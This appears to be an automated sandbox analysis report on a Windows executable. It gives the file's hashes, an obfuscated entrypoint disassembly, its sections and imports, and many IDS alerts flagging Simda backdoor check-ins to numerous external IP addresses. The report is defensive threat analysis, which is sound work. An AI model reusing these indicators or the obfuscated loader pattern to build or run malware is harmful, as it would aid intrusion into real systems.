                                                                                                                                                                                                            SSDEEP:6144:Q+EqFQ9A9ty5bhJcrs0MurPw/c4hd/B/coyXT3nOGX6T+:Q+U9qyFhJy56d/eoyXjn9W+
                                                                                                                                                                                                            TLSH:CE2412E7A7548BAAE9571633A94FC31E516853612F84E453EF01AC2D3CF06E13D7B2A0
                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~.t>.................0.......7................@..........................P.........m...................................

                                                                                                                                                                                                            File Icon

                                                                                                                                                                                                            Icon Hash:000a5575b595b575

                                                                                                                                                                                                            Static PE Info

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Entrypoint:0x401000
                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                            DLL Characteristics:
                                                                                                                                                                                                            Time Stamp:0x3E74BE7E [Sun Mar 16 18:12:14 2003 UTC]
                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                            OS Version Major:4
                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                            File Version Major:4
                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                            Import Hash:e7f2d5507b09bfb1c824fe29a99d8a60

                                                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                            mov eax, 00000000h
                                                                                                                                                                                                            mov edx, 0042B50Bh
                                                                                                                                                                                                            mov ecx, edx
                                                                                                                                                                                                            add ecx, 000124B4h
                                                                                                                                                                                                            push ecx
                                                                                                                                                                                                            mov dword ptr [0043D34Bh], 00000000h
                                                                                                                                                                                                            mov ecx, dword ptr [0043D34Bh]
                                                                                                                                                                                                            push ecx
                                                                                                                                                                                                            call dword ptr [004260E0h]
                                                                                                                                                                                                            mov dword ptr [0043DA40h], eax
                                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                                            mov ebx, 00214203h
                                                                                                                                                                                                            add ebx, 00229C1Fh
                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                            mov dword ptr [0043E0FDh], 00000000h
                                                                                                                                                                                                            mov edx, dword ptr [0043E0FDh]
                                                                                                                                                                                                            push edx
                                                                                                                                                                                                            call dword ptr [004260E0h]
                                                                                                                                                                                                            mov dword ptr [0043D478h], eax
                                                                                                                                                                                                            mov dword ptr [0043E0C9h], 000086A2h
                                                                                                                                                                                                            mov eax, dword ptr [0043E0C9h]
                                                                                                                                                                                                            push 00000E1Eh
                                                                                                                                                                                                            pop edx
                                                                                                                                                                                                            shr edx, 06h
                                                                                                                                                                                                            dec edx
                                                                                                                                                                                                            rol edx, 05h
                                                                                                                                                                                                            sub edx, dword ptr [0043DA4Eh]
                                                                                                                                                                                                            sub edx, eax
                                                                                                                                                                                                            mov ebx, edx
                                                                                                                                                                                                            add ebx, dword ptr [0043E424h]
                                                                                                                                                                                                            inc ebx
                                                                                                                                                                                                            shl ebx, 1
                                                                                                                                                                                                            add dword ptr [0043D75Eh], ebx
                                                                                                                                                                                                            call 00007FB3408AC432h
                                                                                                                                                                                                            mov dword ptr [0043D653h], eax
                                                                                                                                                                                                            mov edx, 002728E2h
                                                                                                                                                                                                            add edx, 001CA88Dh
                                                                                                                                                                                                            push edx
                                                                                                                                                                                                            mov ecx, 003F5ECEh
                                                                                                                                                                                                            mov ebp, ecx
                                                                                                                                                                                                            mov edi, 00047C6Dh
                                                                                                                                                                                                            add ebp, edi
                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                            push 0014ADBCh
                                                                                                                                                                                                            pop esi
                                                                                                                                                                                                            mov dword ptr [0043D7C8h], 002F2F1Eh
                                                                                                                                                                                                            add esi, dword ptr [0043D7C8h]

                                                                                                                                                                                                            Data Directories

                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x261d40xb4.fwQO
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x2a048.rsrc
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x940000x4aa.reloc
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x383dc0x1c.D
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                            Sections

                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                            .text0x10000x2fd90x3000d73d0e281626fbb3ecec77d2e8aa1769False0.7303059895833334COM executable for DOS6.420148786453065IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .dHGmL0x40000x733d0x600146ba48b12ddc4d87c37c42526e6cd84False0.181640625Matlab v4 mat-file (little endian) \333_^\020U, numeric, rows 0, columns 01.4859327833763099IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .lzmjSu0xc0000xc1af0x20061af0c0d83c1325686ba8762e3e8d981False0.40234375data2.787352355338978IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .YOSWO0x190000x4ff90x6008f3ef2f627573ad2dcb3e05b99ae413bFalse0.5924479166666666data4.742875837921052IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .sTDEgl0x1e0000x74430x8003a8e8bd0335dc84a50fc5c79b67c3d0aFalse0.60009765625data5.035390472599325IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .fwQO0x260000x797a0xe00e879e25bdf58f45d60295218e86bc236False0.4361049107142857data4.86580950341829IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .L0x2e0000x978e0x200010aea57b2cd53e20b70dee59aedc905False0.640625data4.558249274598118IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .D0x380000x401a0x600c2b33e6b4777caf26721728b1213be8bFalse0.57421875data4.666855552838835IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .data0x3d0000x26910x2800f66ee5f77d63a2d0f55a13b4aab8b246False0.84580078125data7.005203294431193IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .kubC0x400000x616d0x4000fc3d2bf5e87a10e3ed265156ec1b7b7False0.2353515625Matlab v4 mat-file (little endian) \316, numeric, rows 0, columns 01.822118650991909IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .hkw0x470000x21b590x6001427a6ec5060bd3a64df6cc9b4758b57False0.15494791666666666data1.2660415037779147IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .rsrc0x690000x2a0480x2a2005363093beaf747e12444bb8e872dcf11False0.9833028097181009data7.981989177826033IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .reloc0x940000x4aa0x6006af87ce341dd6bf5cc992452b47fea53False0.7565104166666666data6.20097753724165IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                            Resources

                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                            RT_ICON0x691780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.41627579737335835
                                                                                                                                                                                                            RT_DIALOG0x6a2200x3adataEnglishUnited States0.9827586206896551
                                                                                                                                                                                                            RT_RCDATA0x6a25c0x28b94dataEnglishUnited States1.0003656986643006
                                                                                                                                                                                                            RT_GROUP_ICON0x92df00x14dataEnglishUnited States1.1
                                                                                                                                                                                                            RT_VERSION0x92e040x244dataEnglishUnited States0.5431034482758621

                                                                                                                                                                                                            Imports

                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                            KERNEL32.DLLDosDateTimeToFileTime, GetSystemDirectoryW, WriteFile, GetProcAddress, CreateFileA, GetModuleHandleA, CreateDirectoryA, FileTimeToSystemTime, IsBadStringPtrA, GetSystemDirectoryA, GetTimeFormatA, lstrcpyn, LocalAlloc, OpenWaitableTimerA, EnumCalendarInfoA, GetNamedPipeInfo, IsValidCodePage
                                                                                                                                                                                                            USER32.DLLEnumChildWindows, GetSysColor, DialogBoxParamA, CreateMenu, EnumDesktopsA, GetClassNameA, CharNextA, ReleaseDC, RegisterWindowMessageA, EnumWindows, InvalidateRgn, SetWindowLongA, ShowCursor, CreateAcceleratorTableW, GetCaretPos, SetFocus, UnregisterClassW, PeekMessageW, SetMenu, GetMenuItemInfoA, LoadImageA, SendMessageW, DialogBoxIndirectParamA, CopyRect, GetWindowRect, GetScrollPos, CopyImage, GetSysColorBrush, PostQuitMessage, CheckDlgButton, GetDC, IsWindowEnabled, FillRect, CharLowerA, CreateDesktopA, UpdateWindow, SetCapture, SendDlgItemMessageW, LoadBitmapW, CreateWindowExW, GetDlgItemTextA, DefDlgProcA, GetKeyboardType, DefWindowProcW, CloseWindow, DestroyIcon, SetActiveWindow, CharUpperW
                                                                                                                                                                                                            gdi32.dllGetPixelFormat, GetMetaRgn, GetEnhMetaFilePaletteEntries, GetWorldTransform, GetTextExtentExPointA, GetPath, GetLogColorSpaceW
                                                                                                                                                                                                            advapi32.dllRegOpenKeyExA, RegCreateKeyExW, RegCloseKey, RegDeleteValueW, RegReplaceKeyA, RegEnumValueA
                                                                                                                                                                                                            shell32.dllStrCmpNIA, StrRStrA, StrStrIA
                                                                                                                                                                                                            WINSPOOL.DRVEnumPrinterDataA, AddPortW, DocumentPropertiesW, GetJobA, ConfigurePortA, AddMonitorA, EnumPrinterKeyA, EndPagePrinter, DocumentPropertySheets
                                                                                                                                                                                                            INETCOMM.DLLMimeOleConvertEnrichedToHTML, MimeOleSMimeCapInit, MimeOleGetBodyPropW, MimeEditViewSource, DllGetClassObject, MimeOleCreateMessageParts, MimeOleCreateBody, HrGetDisplayNameWithSizeForFile, CreateIMAPTransport, HrFreeAttachData, HrGetLastOpenFileDirectoryW, MimeOleGetCodePageCharset, MimeEditDocumentFromStream
                                                                                                                                                                                                            CRYPT32.DLLCryptSignCertificate, CertCreateCRLContext, CryptMsgOpenToDecode, CertIsValidCRLForCertificate, CryptGetOIDFunctionAddress, CertAddEncodedCertificateToStore

                                                                                                                                                                                                            Possible Origin

                                                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                            EnglishUnited States

                                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                                            Suricata IDS Alerts

                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                            2024-11-11T18:07:37.529053+01002021022ET MALWARE Wapack Labs Sinkhole DNS Reply11.1.1.153192.168.2.955552UDP
                                                                                                                                                                                                            2024-11-11T18:07:38.142480+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.9568603.94.10.3480TCP
                                                                                                                                                                                                            2024-11-11T18:07:38.149523+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.94.10.3480192.168.2.956860TCP
                                                                                                                                                                                                            2024-11-11T18:07:38.149523+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.94.10.3480192.168.2.956860TCP
                                                                                                                                                                                                            2024-11-11T18:07:38.533489+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95686123.253.46.6480TCP
                                                                                                                                                                                                            2024-11-11T18:07:38.535087+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95686499.83.170.380TCP
                                                                                                                                                                                                            2024-11-11T18:07:38.775166+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95686918.208.156.24880TCP
                                                                                                                                                                                                            2024-11-11T18:07:38.813587+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956865188.114.96.380TCP
                                                                                                                                                                                                            2024-11-11T18:07:38.823176+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95687044.221.84.10580TCP
                                                                                                                                                                                                            2024-11-11T18:07:38.828867+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz144.221.84.10580192.168.2.956870TCP
                                                                                                                                                                                                            2024-11-11T18:07:38.828867+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst144.221.84.10580192.168.2.956870TCP
                                                                                                                                                                                                            2024-11-11T18:07:38.831305+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95687144.221.84.10580TCP
                                                                                                                                                                                                            2024-11-11T18:07:38.878019+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956872208.100.26.24580TCP
                                                                                                                                                                                                            2024-11-11T18:07:38.908208+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956874199.59.243.22780TCP
                                                                                                                                                                                                            2024-11-11T18:07:39.016662+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95687523.253.46.6480TCP
                                                                                                                                                                                                            2024-11-11T18:07:39.603334+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956872208.100.26.24580TCP
                                                                                                                                                                                                            2024-11-11T18:07:39.811744+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95687699.83.170.3443TCP
                                                                                                                                                                                                            2024-11-11T18:07:39.915129+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95688385.17.31.8280TCP
                                                                                                                                                                                                            2024-11-11T18:07:39.990050+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956873199.191.50.8380TCP
                                                                                                                                                                                                            2024-11-11T18:07:40.393903+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956884154.212.231.8280TCP
                                                                                                                                                                                                            2024-11-11T18:07:40.399346+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956880188.114.96.3443TCP
                                                                                                                                                                                                            2024-11-11T18:07:40.532826+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95688885.17.31.8280TCP
                                                                                                                                                                                                            2024-11-11T18:07:40.748014+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956865188.114.96.380TCP
                                                                                                                                                                                                            2024-11-11T18:07:40.766398+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956884154.212.231.8280TCP
                                                                                                                                                                                                            2024-11-11T18:07:41.957137+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956896188.114.96.3443TCP
                                                                                                                                                                                                            2024-11-11T18:07:42.480434+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95690513.248.169.4880TCP
                                                                                                                                                                                                            2024-11-11T18:07:43.094747+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.9569123.94.10.3480TCP
                                                                                                                                                                                                            2024-11-11T18:07:43.097029+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95691318.208.156.24880TCP
                                                                                                                                                                                                            2024-11-11T18:07:43.103707+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.208.156.24880192.168.2.956913TCP
                                                                                                                                                                                                            2024-11-11T18:07:43.103707+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.208.156.24880192.168.2.956913TCP
                                                                                                                                                                                                            2024-11-11T18:07:43.319223+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956911188.114.96.380TCP
                                                                                                                                                                                                            2024-11-11T18:07:43.506855+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956915103.150.10.4880TCP
                                                                                                                                                                                                            2024-11-11T18:07:44.573349+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956915103.150.10.4880TCP
                                                                                                                                                                                                            2024-11-11T18:07:45.418961+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956920188.114.96.3443TCP
                                                                                                                                                                                                            2024-11-11T18:07:45.827714+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956911188.114.96.380TCP
                                                                                                                                                                                                            2024-11-11T18:07:47.727136+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956942188.114.96.3443TCP
                                                                                                                                                                                                            2024-11-11T18:07:48.335359+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95696076.223.67.18980TCP
                                                                                                                                                                                                            2024-11-11T18:07:48.528190+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95696164.225.91.7380TCP
                                                                                                                                                                                                            2024-11-11T18:07:48.544333+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95696544.221.84.10580TCP
                                                                                                                                                                                                            2024-11-11T18:07:48.649502+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956964103.224.212.21080TCP
                                                                                                                                                                                                            2024-11-11T18:07:48.800073+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956967103.224.182.25280TCP
                                                                                                                                                                                                            2024-11-11T18:07:49.011613+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956966154.85.183.5080TCP
                                                                                                                                                                                                            2024-11-11T18:07:49.390994+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956966154.85.183.5080TCP
                                                                                                                                                                                                            2024-11-11T18:07:51.325141+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.94926964.225.91.7380TCP
                                                                                                                                                                                                            2024-11-11T18:07:51.613163+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.94927672.52.179.17480TCP
                                                                                                                                                                                                            2024-11-11T18:07:52.362516+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.94927772.52.179.17480TCP
                                                                                                                                                                                                            2024-11-11T18:07:52.399217+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.949270TCP
                                                                                                                                                                                                            2024-11-11T18:07:54.944524+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95597352.34.198.22980TCP
                                                                                                                                                                                                            2024-11-11T18:07:54.975218+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz152.34.198.22980192.168.2.955973TCP
                                                                                                                                                                                                            2024-11-11T18:07:54.975218+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst152.34.198.22980192.168.2.955973TCP
                                                                                                                                                                                                            2024-11-11T18:07:58.285586+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95429244.221.84.10580TCP
                                                                                                                                                                                                            2024-11-11T18:07:59.940430+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956872208.100.26.24580TCP
                                                                                                                                                                                                            2024-11-11T18:08:00.099845+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956872208.100.26.24580TCP
                                                                                                                                                                                                            2024-11-11T18:08:00.144995+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95495385.17.31.8280TCP
                                                                                                                                                                                                            2024-11-11T18:08:00.153686+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956865188.114.96.380TCP
                                                                                                                                                                                                            2024-11-11T18:08:00.293301+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956884154.212.231.8280TCP
                                                                                                                                                                                                            2024-11-11T18:08:00.308534+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95495423.253.46.6480TCP
                                                                                                                                                                                                            2024-11-11T18:08:00.322696+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.954955199.59.243.22780TCP
                                                                                                                                                                                                            2024-11-11T18:08:00.369223+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95495699.83.170.380TCP
                                                                                                                                                                                                            2024-11-11T18:08:00.875450+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956884154.212.231.8280TCP
                                                                                                                                                                                                            2024-11-11T18:08:00.920285+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95496285.17.31.8280TCP
                                                                                                                                                                                                            2024-11-11T18:08:00.962845+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95496323.253.46.6480TCP
                                                                                                                                                                                                            2024-11-11T18:08:01.345730+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95496499.83.170.3443TCP
                                                                                                                                                                                                            2024-11-11T18:08:01.969269+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.954965188.114.96.3443TCP
                                                                                                                                                                                                            2024-11-11T18:08:02.366358+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956865188.114.96.380TCP
                                                                                                                                                                                                            2024-11-11T18:08:04.669156+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.954978188.114.96.3443TCP
                                                                                                                                                                                                            2024-11-11T18:08:05.043672+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956915103.150.10.4880TCP
                                                                                                                                                                                                            2024-11-11T18:08:05.190951+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956911188.114.96.380TCP
                                                                                                                                                                                                            2024-11-11T18:08:05.776408+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956915103.150.10.4880TCP
                                                                                                                                                                                                            2024-11-11T18:08:07.015466+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.955002188.114.96.3443TCP
                                                                                                                                                                                                            2024-11-11T18:08:07.387221+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956911188.114.96.380TCP
                                                                                                                                                                                                            2024-11-11T18:08:09.279058+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.955020188.114.96.3443TCP
                                                                                                                                                                                                            2024-11-11T18:08:09.679570+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956966154.85.183.5080TCP
                                                                                                                                                                                                            2024-11-11T18:08:09.918822+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.955032103.224.212.21080TCP
                                                                                                                                                                                                            2024-11-11T18:08:09.966780+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956966154.85.183.5080TCP
                                                                                                                                                                                                            2024-11-11T18:08:09.967882+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.955033103.224.182.25280TCP
                                                                                                                                                                                                            2024-11-11T18:08:11.832465+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96221272.52.179.17480TCP
                                                                                                                                                                                                            2024-11-11T18:08:12.298141+01002021022ET MALWARE Wapack Labs Sinkhole DNS Reply11.1.1.153192.168.2.955413UDP
                                                                                                                                                                                                            2024-11-11T18:08:12.333786+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96221372.52.179.17480TCP
                                                                                                                                                                                                            2024-11-11T18:08:20.358578+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962370199.191.50.8380TCP
                                                                                                                                                                                                            2024-11-11T18:08:22.156579+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962592199.59.243.22780TCP
                                                                                                                                                                                                            2024-11-11T18:08:22.212272+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96259344.221.84.10580TCP
                                                                                                                                                                                                            2024-11-11T18:08:25.605304+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.9626053.94.10.3480TCP
                                                                                                                                                                                                            2024-11-11T18:08:25.606528+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96260675.2.71.19980TCP
                                                                                                                                                                                                            2024-11-11T18:08:25.608405+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96260844.221.84.10580TCP
                                                                                                                                                                                                            2024-11-11T18:08:25.633836+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96260723.253.46.6480TCP
                                                                                                                                                                                                            2024-11-11T18:08:25.828549+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962611199.59.243.22780TCP
                                                                                                                                                                                                            2024-11-11T18:08:25.837793+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962610208.100.26.24580TCP
                                                                                                                                                                                                            2024-11-11T18:08:25.869278+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962604188.114.96.380TCP
                                                                                                                                                                                                            2024-11-11T18:08:25.929132+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96261318.208.156.24880TCP
                                                                                                                                                                                                            2024-11-11T18:08:25.964401+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96261444.221.84.10580TCP
                                                                                                                                                                                                            2024-11-11T18:08:26.239476+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962609154.212.231.8280TCP
                                                                                                                                                                                                            2024-11-11T18:08:26.788544+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.9626153.94.10.3480TCP
                                                                                                                                                                                                            2024-11-11T18:08:26.789277+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96261918.208.156.24880TCP
                                                                                                                                                                                                            2024-11-11T18:08:26.819831+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96262023.253.46.6480TCP
                                                                                                                                                                                                            2024-11-11T18:08:27.235548+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962618154.212.231.8280TCP
                                                                                                                                                                                                            2024-11-11T18:08:27.791975+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962603199.191.50.8380TCP
                                                                                                                                                                                                            2024-11-11T18:08:28.500498+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962616199.191.50.8380TCP
                                                                                                                                                                                                            2024-11-11T18:08:29.510956+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96262344.221.84.10580TCP
                                                                                                                                                                                                            2024-11-11T18:08:29.522912+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962625199.59.243.22780TCP
